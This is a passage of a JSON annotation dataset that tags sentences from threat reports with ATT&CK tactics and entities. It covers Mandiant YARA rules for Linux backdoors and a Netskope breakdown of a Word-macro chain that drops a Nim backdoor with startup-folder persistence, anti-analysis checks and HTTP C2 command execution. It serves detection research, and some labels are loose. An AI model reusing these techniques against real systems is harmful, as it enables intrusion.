\"/proc/self/exe\" fullword $x2 = \"socket\" fullword $x3 = \"127.\"", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-13_aptnotes_report-p19-s186-c5d1ca", "source": "aptnotes", "doc_id": "13_aptnotes_report", "page_number": 19, "sentence_id": 186, "context_before": "2266667af7532a32b9c21c330a9fe56356ca66610e39654804a7262f2af61017 THINCRUST sample SHA256 4e4c5e5ca588bd84b67a37b654ec522768fa83e535ff795a5c196da8f8b9737d Related to THINCRUST YARA Rules rule M_Hunting_Util_TABLEFLIP_1 { meta:\nauthor = \"Mandiant\" description = \"Looks for TABLEFLIP Binary\" md5 = \"b6e92149efaf78e9ce7552297505b9d5\" strings:\n$z1 = \"%1$s.*%2$d\" fullword $x1 = \"/proc/self/exe\" fullword $x2 = \"socket\" fullword $x3 = \"127.\"", "sentence_text": "fullword $x4 = \"iptables -t nat\" fullword $s1 = \"iptables -t nat -S PREROUTING | grep", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-13_aptnotes_report-p19-s187-6490a3", "source": "aptnotes", "doc_id": "13_aptnotes_report", "page_number": 19, "sentence_id": 187, "context_before": "fullword $x4 = \"iptables -t nat\" fullword $s1 = \"iptables -t nat -S PREROUTING | grep", "sentence_text": "== 0x464c457f and filesize < 5MB and @x1 <= @x2 and @x2 <= @x3 and @x3 <= @x4 and ( $z1 or any of ($s*) )\n}\n19/21", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-13_aptnotes_report-p20-s188-b9e6e8", "source": "aptnotes", "doc_id": "13_aptnotes_report", "page_number": 20, "sentence_id": 188, "context_before": "== 0x464c457f and filesize < 5MB and @x1 <= @x2 and @x2 <= @x3 and @x3 <= @x4 and ( $z1 or any of ($s*) )\n}\n19/21", "sentence_text": "rule M_Hunting_Backdoor_REPTILE_1\n{\nmeta:\nauthor = \"Mandiant\" description = \"Looks for ELF backdoor REPTILE variant\" md5 = \"53a69adac914808eced2bf8155a7512d\" strings:\n$x1 = \";7(Zu9YTsA7qQ#vw\" $x2 = \"mznCvqSBo\" $x3 = \"hpaVAj2FJ\" $x4 = \"%d.%d.%d.%d\" $x5 = \"HISTFILE=\" $x6 = \"TERM\" $x7 = { 58 90 AE 86 F1 B9 1C F6 29 83 95 71 1D DE 58 0D } // taken from FE_Hunting_Linux_TINYSHELL_2_FEBeta.yara condition:\nuint32(0)", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-13_aptnotes_report-p21-s189-71ae9b", "source": "aptnotes", "doc_id": "13_aptnotes_report", "page_number": 21, "sentence_id": 189, "context_before": "rule M_Hunting_Backdoor_REPTILE_1\n{\nmeta:\nauthor = \"Mandiant\" description = \"Looks for ELF backdoor REPTILE variant\" md5 = \"53a69adac914808eced2bf8155a7512d\" strings:\n$x1 = \";7(Zu9YTsA7qQ#vw\" $x2 = \"mznCvqSBo\" $x3 = \"hpaVAj2FJ\" $x4 = \"%d.%d.%d.%d\" $x5 = \"HISTFILE=\" $x6 = \"TERM\" $x7 = { 58 90 AE 86 F1 B9 1C F6 29 83 95 71 1D DE 58 0D } // taken from FE_Hunting_Linux_TINYSHELL_2_FEBeta.yara condition:\nuint32(0)", "sentence_text": "rule M_Hunting_Backdoor_CASTLETAP_1\n{\nmeta:\nauthor = \"Mandiant\" description = \"Finds strings observed in CASTLETOP ELF binary\" md5 = \"e2d2884869f48f40b32fb27cc3bdefff\" strings:\n$x1 = \";7(Zu9YTsA7qQ#vw\" $x2 = \"qWWlC0v6yYh2yxu\" $x3 = \"1qaz@WSXa\" $x4 = \"hpaVAj2FJ\" $x5 = \"%d.%d.%d.%d\" $x6 = \"HISTFILE=\" $x7 = \"TERM\" $x8 = \"/tmp/busybox\" $x9 = { 58 90 AE 86 F1 B9 1C F6 29 83 95 71 1D DE 58 0D } condition:\nuint16(18)", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-13_aptnotes_report-p21-s190-7b5faf", "source": "aptnotes", "doc_id": "13_aptnotes_report", "page_number": 21, "sentence_id": 190, "context_before": "rule M_Hunting_Backdoor_CASTLETAP_1\n{\nmeta:\nauthor = \"Mandiant\" description = \"Finds strings observed in CASTLETOP ELF binary\" md5 = \"e2d2884869f48f40b32fb27cc3bdefff\" strings:\n$x1 = \";7(Zu9YTsA7qQ#vw\" $x2 = \"qWWlC0v6yYh2yxu\" $x3 = \"1qaz@WSXa\" $x4 = \"hpaVAj2FJ\" $x5 = \"%d.%d.%d.%d\" $x6 = \"HISTFILE=\" $x7 = \"TERM\" $x8 = \"/tmp/busybox\" $x9 = { 58 90 AE 86 F1 B9 1C F6 29 83 95 71 1D DE 58 0D } condition:\nuint16(18)", "sentence_text": "== 0x464c457f and 1 of ($x*) and #x5 >= 3 and #x7 == 1 and filesize < 15MB } rule M_Hunting_Backdoor_CASTLETAP_2 { meta:\nauthor = \"Mandiant\" description = \"Finds byte pattern related to XOR decode function\" md5 = \"e2d2884869f48f40b32fb27cc3bdefff\" strings:\n$x1 = { ??", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-13_aptnotes_report-p21-s193-228b15", "source": "aptnotes", "doc_id": "13_aptnotes_report", "page_number": 21, "sentence_id": 193, "context_before": "B0 1D 11 ??", "sentence_text": "== 0x464c457f and any of them and filesize < 15MB } 21/21", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-14_aptnotes_report-p1-s1-2ace79", "source": "aptnotes", "doc_id": "14_aptnotes_report", "page_number": 1, "sentence_id": 1, "context_before": "[START]", "sentence_text": "A Look at the Nim-based Campaign Using Microsoft Word Docs to Impersonate the Nepali Government netskope.com/blog/a-look-at-the-nim-based-campaign-using-microsoft-word-docs-to-impersonate-the-nepali- government December 20, 2023 Summary Threat actors often employ stealthy attack techniques to elude detection and stay under the defender’s radar.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-14_aptnotes_report-p1-s2-7b5259", "source": "aptnotes", "doc_id": "14_aptnotes_report", "page_number": 1, "sentence_id": 2, "context_before": "A Look at the Nim-based Campaign Using Microsoft Word Docs to Impersonate the Nepali Government netskope.com/blog/a-look-at-the-nim-based-campaign-using-microsoft-word-docs-to-impersonate-the-nepali- government December 20, 2023 Summary Threat actors often employ stealthy attack techniques to elude detection and stay under the defender’s radar.", "sentence_text": "One way they do so is by using uncommon programming languages to develop malware.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-14_aptnotes_report-p1-s3-c74317", "source": "aptnotes", "doc_id": "14_aptnotes_report", "page_number": 1, "sentence_id": 3, "context_before": "One way they do so is by using uncommon programming languages to develop malware.", "sentence_text": "Netskope Threat labs has observed an increase in Nim-based malware over the past year and expects Nim-based malware to become more popular as attackers continue to modify existing Nim-based samples.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-14_aptnotes_report-p1-s4-ac6b53", "source": "aptnotes", "doc_id": "14_aptnotes_report", "page_number": 1, "sentence_id": 4, "context_before": "Netskope Threat labs has observed an increase in Nim-based malware over the past year and expects Nim-based malware to become more popular as attackers continue to modify existing Nim-based samples.", "sentence_text": "One of the highest-profile Nim- based malware families was the Dark Power ransomware, which began spreading in the wild earlier this year.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-14_aptnotes_report-p1-s5-3cf4a5", "source": "aptnotes", "doc_id": "14_aptnotes_report", "page_number": 1, "sentence_id": 5, "context_before": "One of the highest-profile Nim- based malware families was the Dark Power ransomware, which began spreading in the wild earlier this year.", "sentence_text": "This blog post provides a breakdown of a recent targeted threat that uses Word document bait to deliver a Nim backdoor.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-14_aptnotes_report-p1-s6-edc61b", "source": "aptnotes", "doc_id": "14_aptnotes_report", "page_number": 1, "sentence_id": 6, "context_before": "This blog post provides a breakdown of a recent targeted threat that uses Word document bait to deliver a Nim backdoor.", "sentence_text": "Delivery Method\nA malicious Word document was used to drop the Nim backdoor.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" }, { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1566.001", "name": "Spearphishing Attachment" } ], "procedure": "Use a malicious Word document as a delivery vector to drop and execute a Nim backdoor on the victim system.", "entities": [ { "text": "A malicious Word document", "start": 16, "end": 41, "label": "MalwareTool" }, { "text": "was used to drop the Nim backdoor", "start": 42, "end": 75, "label": "Action" }, { "text": "Nim backdoor", "start": 63, "end": 75, "label": "MalwareTool" } ] }, { "uid": "aptnotes-14_aptnotes_report-p1-s7-e6ef61", "source": "aptnotes", "doc_id": "14_aptnotes_report", "page_number": 1, "sentence_id": 7, "context_before": "The document was sent as an email attachment, where the sender claims to be a Nepali government official sending security arrangements.", "sentence_text": "The document was sent as an email attachment, where the sender claims to be a Nepali government official sending security arrangements.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-14_aptnotes_report-p1-s8-263a87", "source": "aptnotes", "doc_id": "14_aptnotes_report", "page_number": 1, "sentence_id": 8, "context_before": "Initially opening the file will show a blank document with an instruction to enable macros.", "sentence_text": "Initially opening the file will show a blank document with an instruction to enable macros.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-14_aptnotes_report-p1-s9-59a077", "source": "aptnotes", "doc_id": "14_aptnotes_report", "page_number": 1, "sentence_id": 9, "context_before": "When the user clicks “Enable Content,” the auto-trigger routine (Document_Open) in the code will execute.", "sentence_text": "When the user clicks “Enable Content,” the auto-trigger routine (Document_Open) in the code will execute.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1059", "name": "Command and Scripting Interpreter" } ], "procedure": "The macro automatically executes when the user enables content.", "entities": [ { "text": "will execute", "start": 92, "end": 104, "label": "Action" } ] }, { "uid": "aptnotes-14_aptnotes_report-p1-s10-7909fc", "source": "aptnotes", "doc_id": "14_aptnotes_report", "page_number": 1, "sentence_id": 10, "context_before": "When the user clicks “Enable Content,” the auto-trigger routine (Document_Open) in the code will execute.", "sentence_text": "Once the main function is called, the code is executed through additional VBA functions inside the document.\n1/12", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-14_aptnotes_report-p2-s11-9cc5e6", "source": "aptnotes", "doc_id": "14_aptnotes_report", "page_number": 2, "sentence_id": 11, "context_before": "Once the main function is called, the code is executed through additional VBA functions inside the document.\n1/12", "sentence_text": "Malicious Word file prior enabling macro Defense Evasion To help bypass AV and static based detections, the VBA project is password protected and macros are obfuscated using the Chr( ) VBA function and string concatenation.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-14_aptnotes_report-p2-s12-e41487", "source": "aptnotes", "doc_id": "14_aptnotes_report", "page_number": 2, "sentence_id": 12, "context_before": "Malicious Word file prior enabling macro Defense Evasion To help bypass AV and static based detections, the VBA project is password protected and macros are obfuscated using the Chr( ) VBA function and string concatenation.", "sentence_text": "The VBA code is split into the four subroutines in the image below.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-14_aptnotes_report-p2-s13-f71ced", "source": "aptnotes", "doc_id": "14_aptnotes_report", "page_number": 2, "sentence_id": 13, "context_before": "The VBA code is split into the four subroutines in the image below.", "sentence_text": "sch_task is a function that creates a VBscript named “OCu3HBg7gyI9aUaB.vbs” that will serve as the chain trigger.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-14_aptnotes_report-p2-s14-f9deea", "source": "aptnotes", "doc_id": "14_aptnotes_report", "page_number": 2, "sentence_id": 14, "context_before": "sch_task is a function that creates a VBscript named “OCu3HBg7gyI9aUaB.vbs” that will serve as the chain trigger.", "sentence_text": "Initially, the VBscript is created in the AppData startup folder (C:\\Users\\\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\OCu3HBg7gyI9aUaB.vbs) and is set as a hidden file.", "relevant": "yes", "tactic": [ { "id": "TA0003", "name": "Persistence" }, { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1547", "name": "Boot or Logon Autostart Execution" } ], "procedure": "The malware creates a VBScript in the startup folder and hides it to maintain persistence.", "entities": [ { "text": "is created in the AppData startup folder", "start": 24, "end": 64, "label": "Action" }, { "text": "is set as a hidden file", "start": 170, "end": 193, "label": "Action" }, { "text": "C:\\Users\\\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\OCu3HBg7gyI9aUaB.vbs", "start": 66, "end": 164, "label": "Infrastructure_Indicator" } ] }, { "uid": "aptnotes-14_aptnotes_report-p2-s15-059424", "source": "aptnotes", "doc_id": "14_aptnotes_report", "page_number": 2, "sentence_id": 15, "context_before": "Initially, the VBscript is created in the AppData startup folder (C:\\Users\\\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\OCu3HBg7gyI9aUaB.vbs) and is set as a hidden file.", "sentence_text": "Some strings referring to directories and libraries are split and then concatenated to evade static detection.\n2/12", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-14_aptnotes_report-p3-s16-bd36f2", "source": "aptnotes", "doc_id": "14_aptnotes_report", "page_number": 3, "sentence_id": 16, "context_before": "Some strings referring to directories and libraries are split and then concatenated to evade static detection.\n2/12", "sentence_text": "VBA code for sch_task routine.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-14_aptnotes_report-p3-s17-1f5675", "source": "aptnotes", "doc_id": "14_aptnotes_report", "page_number": 3, "sentence_id": 17, "context_before": "VBA code for sch_task routine.", "sentence_text": "hide_cons is a function to create another VBScript named “skriven.vbs,” which will be used by “8lGghf8kIPIuu3cM.bat” as a shell to run other scripts.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-14_aptnotes_report-p3-s18-c3ed0c", "source": "aptnotes", "doc_id": "14_aptnotes_report", "page_number": 3, "sentence_id": 18, "context_before": "hide_cons is a function to create another VBScript named “skriven.vbs,” which will be used by “8lGghf8kIPIuu3cM.bat” as a shell to run other scripts.", "sentence_text": "More detailed info about this batch script is found below.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-14_aptnotes_report-p3-s19-905195", "source": "aptnotes", "doc_id": "14_aptnotes_report", "page_number": 3, "sentence_id": 19, "context_before": "More detailed info about this batch script is found below.", "sentence_text": "Again, some strings referring to directories and libraries are split and then concatenated.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-14_aptnotes_report-p3-s20-fe172d", "source": "aptnotes", "doc_id": "14_aptnotes_report", "page_number": 3, "sentence_id": 20, "context_before": "Again, some strings referring to directories and libraries are split and then concatenated.", "sentence_text": "VBA code for hide_cons routine.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-14_aptnotes_report-p3-s21-b862fe", "source": "aptnotes", "doc_id": "14_aptnotes_report", "page_number": 3, "sentence_id": 21, "context_before": "VBA code for hide_cons routine.", "sentence_text": "read_shell is a function that creates the payload named conhost.exe, which is inside a ZIP archive.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-14_aptnotes_report-p3-s22-d7ec62", "source": "aptnotes", "doc_id": "14_aptnotes_report", "page_number": 3, "sentence_id": 22, "context_before": "read_shell is a function that creates the payload named conhost.exe, which is inside a ZIP archive.", "sentence_text": "As can be seen from the screenshot below of the macro code, it assembles the ZIP from an array of decimals (by converting each to byte) stored in the “UserForm1” object.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-14_aptnotes_report-p3-s23-464f22", "source": "aptnotes", "doc_id": "14_aptnotes_report", "page_number": 3, "sentence_id": 23, "context_before": "As can be seen from the screenshot below of the macro code, it assembles the ZIP from an array of decimals (by converting each to byte) stored in the “UserForm1” object.", "sentence_text": "The resulting byte array is the actual ZIP file and is dropped to C:\\Users\\ \\AppData\\Local\\Microsoft\\conhost.zip 3/12", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1105", "name": "Ingress Tool Transfer" } ], "procedure": "The malware drops a ZIP payload to the local system.", "entities": [ { "text": "is dropped to", "start": 52, "end": 65, "label": "Action" }, { "text": "C:\\Users\\ \\AppData\\Local\\Microsoft\\conhost.zip", "start": 66, "end": 118, "label": "Infrastructure_Indicator" } ] }, { "uid": "aptnotes-14_aptnotes_report-p4-s24-bf9b9f", "source": "aptnotes", "doc_id": "14_aptnotes_report", "page_number": 4, "sentence_id": 24, "context_before": "The resulting byte array is the actual ZIP file and is dropped to C:\\Users\\ \\AppData\\Local\\Microsoft\\conhost.zip 3/12", "sentence_text": "VBA code for read_shell routine.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-14_aptnotes_report-p4-s25-3ff641", "source": "aptnotes", "doc_id": "14_aptnotes_report", "page_number": 4, "sentence_id": 25, "context_before": "VBA code for read_shell routine.", "sentence_text": "UserForm1 Containing Decimal/Bytes.\nvb_chainis a function mainly for creating “8lGghf8kIPIuu3cM.bat”, which will be the stage of infection before the final payload.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-14_aptnotes_report-p4-s26-5845a2", "source": "aptnotes", "doc_id": "14_aptnotes_report", "page_number": 4, "sentence_id": 26, "context_before": "UserForm1 Containing Decimal/Bytes.\nvb_chainis a function mainly for creating “8lGghf8kIPIuu3cM.bat”, which will be the stage of infection before the final payload.", "sentence_text": "Exact file paths are generated by the VBA macro before writing to the batch file.\n4/12", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-14_aptnotes_report-p5-s27-39206e", "source": "aptnotes", "doc_id": "14_aptnotes_report", "page_number": 5, "sentence_id": 27, "context_before": "Exact file paths are generated by the VBA macro before writing to the batch file.\n4/12", "sentence_text": "vb_chain code snapshot.\nDropped Files Summary:\ne2a3edc708016316477228de885f0c39.doc drops:\nOCu3HBg7gyI9aUaB.vbs (C:\\Users\\\n\\AppData\\Roaming\\Microsoft\\Windows\\Start\nMenu\\Programs\\Startup\\OCu3HBg7gyI9aUaB.vbs)\nskriven.vbs (C:\\Users\\\\AppData\\Local\\skriven.vbs)\nconhost.zip (C:\\Users\\\\AppData\\Local\\Microsoft\\conhost.zip)\n8lGghf8kIPIuu3cM.bat (C:\\Users\\\\AppData\\Local\\8lGghf8kIPIuu3cM.bat) drops these in C:\\Users\\\\AppData\\Local:\nunzFile.vbs\nunz.vbs\n2L7uuZQboJBhTERK.bat\n2BYretPBD4iSQKYS.bat\nd.bat\ne.bat\n5/12", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-14_aptnotes_report-p6-s28-3f6a16", "source": "aptnotes", "doc_id": "14_aptnotes_report", "page_number": 6, "sentence_id": 28, "context_before": "Dropped Files Summary:", "sentence_text": "Nim Backdoor The Word document drops a malicious backdoor named “conhost.exe”.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1204", "name": "User Execution" } ], "procedure": "The malicious document drops a backdoor payload on the system.", "entities": [ { "text": "drops a malicious backdoor", "start": 31, "end": 57, "label": "Action" }, { "text": "conhost.exe", "start": 65, "end": 76, "label": "MalwareTool" } ] }, { "uid": "aptnotes-14_aptnotes_report-p6-s29-2e0119", "source": "aptnotes", "doc_id": "14_aptnotes_report", "page_number": 6, "sentence_id": 29, "context_before": "Nim Backdoor\nThe Word document drops a malicious backdoor named “conhost.exe”.", "sentence_text": "The malware is written in Nim and was likely compiled on September 20, 2023.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-14_aptnotes_report-p6-s30-f9d8a3", "source": "aptnotes", "doc_id": "14_aptnotes_report", "page_number": 6, "sentence_id": 30, "context_before": "The malware is written in Nim and was likely compiled on September 20, 2023.", "sentence_text": "Nim is a statically typed compiled programming language.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-14_aptnotes_report-p7-s31-bc6b01", "source": "aptnotes", "doc_id": "14_aptnotes_report", "page_number": 7, "sentence_id": 31, "context_before": "Nim is a statically typed compiled programming language.", "sentence_text": "The backdoor runs within the same privilege as the current user logged in.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-14_aptnotes_report-p7-s32-c26619", "source": "aptnotes", "doc_id": "14_aptnotes_report", "page_number": 7, "sentence_id": 32, "context_before": "The backdoor runs within the same privilege as the current user logged in.", "sentence_text": "It’s looking to continue its ploy that the file was from a Nepali authority by imitating government domains for its C&C server ([.]govnp[.]org).", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-14_aptnotes_report-p7-s33-ab743f", "source": "aptnotes", "doc_id": "14_aptnotes_report", "page_number": 7, "sentence_id": 33, "context_before": "It’s looking to continue its ploy that the file was from a Nepali authority by imitating government domains for its C&C server ([.]govnp[.]org).", "sentence_text": "When this backdoor is left undetected, users are at risk of having attackers gaining remote access.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-14_aptnotes_report-p7-s34-e52b02", "source": "aptnotes", "doc_id": "14_aptnotes_report", "page_number": 7, "sentence_id": 34, "context_before": "When this backdoor is left undetected, users are at risk of having attackers gaining remote access.", "sentence_text": "Even though the C2 servers are no longer accessible at the time of analysis, we were still able to extrapolate some of its behaviors, which can be seen below.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-14_aptnotes_report-p7-s35-d157f5", "source": "aptnotes", "doc_id": "14_aptnotes_report", "page_number": 7, "sentence_id": 35, "context_before": "Even though the C2 servers are no longer accessible at the time of analysis, we were still able to extrapolate some of its behaviors, which can be seen below.", "sentence_text": "Anti-analysis Technique\nThe malware performs a simple background check before connecting to its command and control server.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-14_aptnotes_report-p7-s36-8ecab7", "source": "aptnotes", "doc_id": "14_aptnotes_report", "page_number": 7, "sentence_id": 36, "context_before": "Anti-analysis Technique\nThe malware performs a simple background check before connecting to its command and control server.", "sentence_text": "Initially, the Nim backdoor spawns a command prompt to run tasklist.exe and checks for any processes running from its list of known analysis tools.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" }, { "id": "TA0007", "name": "Discovery" } ], "techniques": [ { "id": "T1057", "name": "Process Discovery" } ], "procedure": "Spawn a command prompt to execute tasklist.exe and inspect running processes to detect analysis tools.", "entities": [ { "text": "Nim backdoor", "start": 15, "end": 27, "label": "MalwareTool" }, { "text": "spawns a command prompt", "start": 28, "end": 51, "label": "Action" }, { "text": "run tasklist.exe", "start": 55, "end": 71, "label": "Action" }, { "text": "checks for any processes running from its list of known analysis tools", "start": 76, "end": 146, "label": "Action" }, { "text": "tasklist.exe", "start": 59, "end": 71, "label": "MalwareTool" } ] }, { "uid": "aptnotes-14_aptnotes_report-p7-s37-e3021b", "source": "aptnotes", "doc_id": "14_aptnotes_report", "page_number": 7, "sentence_id": 37, "context_before": "Initially, the Nim backdoor spawns a command prompt to run tasklist.exe and checks for any processes running from its list of known analysis tools.", "sentence_text": "The backdoor will terminate itself shortly if it sees any of the analysis tools from the list running.\n7/12", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": null, "procedure": "Terminate execution if analysis tools are detected on the system.", "entities": [ { "text": "The backdoor", "start": 0, "end": 12, "label": "MalwareTool" }, { "text": "terminate itself", "start": 18, "end": 34, "label": "Action" }, { "text": "sees any of the analysis tools from the list running", "start": 49, "end": 101, "label": "Action" }, { "text": "analysis tools", "start": 65, "end": 79, "label": "Infrastructure_Indicator" } ] }, { "uid": "aptnotes-14_aptnotes_report-p8-s38-5d4100", "source": "aptnotes", "doc_id": "14_aptnotes_report", "page_number": 8, "sentence_id": 38, "context_before": "The backdoor will terminate itself shortly if it sees any of the analysis tools from the list running.\n7/12", "sentence_text": "Processes the backdoor avoids Command and control through web protocol Once the backdoor confirms there are no analysis tools running, it will spawn another command prompt instance to get the machine’s hostname, then connect to its C&C server.", "relevant": "yes", "tactic": [ { "id": "TA0007", "name": "Discovery" }, { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1057", "name": "Process Discovery" } ], "procedure": "After confirming absence of analysis tools, spawn a command prompt to obtain the hostname and establish a connection to the C2 server.", "entities": [ { "text": "the backdoor", "start": 10, "end": 22, "label": "MalwareTool" }, { "text": "confirms there are no analysis tools running", "start": 89, "end": 133, "label": "Action" }, { "text": "spawn another command prompt instance", "start": 143, "end": 180, "label": "Action" }, { "text": "get the machine’s hostname", "start": 184, "end": 210, "label": "Action" }, { "text": "connect to its C&C server", "start": 217, "end": 242, "label": "Action" }, { "text": "analysis tools", "start": 111, "end": 125, "label": "Infrastructure_Indicator" }, { "text": "the machine’s hostname", "start": 188, "end": 210, "label": "Infrastructure_Indicator" }, { "text": "C&C server", "start": 232, "end": 242, "label": "Infrastructure_Indicator" } ] }, { "uid": "aptnotes-14_aptnotes_report-p8-s39-7467c4", "source": "aptnotes", "doc_id": "14_aptnotes_report", "page_number": 8, "sentence_id": 39, "context_before": "Processes the backdoor avoids Command and control through web protocol Once the backdoor confirms there are no analysis tools running, it will spawn another command prompt instance to get the machine’s hostname, then connect to its C&C server.", "sentence_text": "It encrypts the hostname with a function named bakery.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1027", "name": "Obfuscated Files or Information" } ], "procedure": "Encrypt the hostname using a custom function prior to further use or transmission.", "entities": [ { "text": "encrypts the hostname", "start": 3, "end": 24, "label": "Action" }, { "text": "the hostname", "start": 12, "end": 24, "label": "Infrastructure_Indicator" }, { "text": "function named bakery", "start": 32, "end": 53, "label": "MalwareTool" } ] }, { "uid": "aptnotes-14_aptnotes_report-p8-s40-b3ac07", "source": "aptnotes", "doc_id": "14_aptnotes_report", "page_number": 8, "sentence_id": 40, "context_before": "It encrypts the hostname with a function named bakery.", "sentence_text": "The command delivered by the C&C server is obtained through an HTTP GET request.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1071.001", "name": "Application Layer Protocol: Web Protocols" } ], "procedure": "Retrieve commands from the C2 server using an HTTP GET request.", "entities": [ { "text": "obtained through an HTTP GET request", "start": 43, "end": 79, "label": "Action" }, { "text": "the C&C server", "start": 25, "end": 39, "label": "Infrastructure_Indicator" }, { "text": "HTTP GET request", "start": 63, "end": 79, "label": "Infrastructure_Indicator" } ] }, { "uid": "aptnotes-14_aptnotes_report-p8-s41-bc8c86", "source": "aptnotes", "doc_id": "14_aptnotes_report", "page_number": 8, "sentence_id": 41, "context_before": "The command delivered by the C&C server is obtained through an HTTP GET request.", "sentence_text": "Response data from GET contains the command from the C&C server.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-14_aptnotes_report-p8-s42-f22996", "source": "aptnotes", "doc_id": "14_aptnotes_report", "page_number": 8, "sentence_id": 42, "context_before": "Response data from GET contains the command from the C&C server.", "sentence_text": "If the response data is different from the last time it was fetched, it means that the C&C server has issued a new command.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-14_aptnotes_report-p8-s43-7dd6b7", "source": "aptnotes", "doc_id": "14_aptnotes_report", "page_number": 8, "sentence_id": 43, "context_before": "If the response data is different from the last time it was fetched, it means that the C&C server has issued a new command.", "sentence_text": "Otherwise it will be dormant and keep requesting the command from the C&C server.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": null, "procedure": "Remain dormant while periodically requesting commands from the C2 server.", "entities": [ { "text": "be dormant", "start": 18, "end": 28, "label": "Action" }, { "text": "keep requesting the command from the C&C server", "start": 33, "end": 80, "label": "Action" }, { "text": "the C&C server", "start": 66, "end": 80, "label": "Infrastructure_Indicator" } ] }, { "uid": "aptnotes-14_aptnotes_report-p8-s44-b890d3", "source": "aptnotes", "doc_id": "14_aptnotes_report", "page_number": 8, "sentence_id": 44, "context_before": "Otherwise it will be dormant and keep requesting the command from the C&C server.", "sentence_text": "Decryption of response data (command) is done by the confectionary function, then concatenated with cmd /c to execute the command.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1059.003", "name": "Windows Command Shell" } ], "procedure": "execute command via cmd /c after decrypting response data", "entities": [ { "text": "cmd /c", "start": 100, "end": 106, "label": "MalwareTool" }, { "text": "concatenated with cmd /c to execute the command", "start": 82, "end": 129, "label": "Action" } ] }, { "uid": "aptnotes-14_aptnotes_report-p8-s45-c2321a", "source": "aptnotes", "doc_id": "14_aptnotes_report", "page_number": 8, "sentence_id": 45, "context_before": "Decryption of response data (command) is done by the confectionary function, then concatenated with cmd /c to execute the command.", "sentence_text": "The execution result is also sent back to the server through a GET request.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ 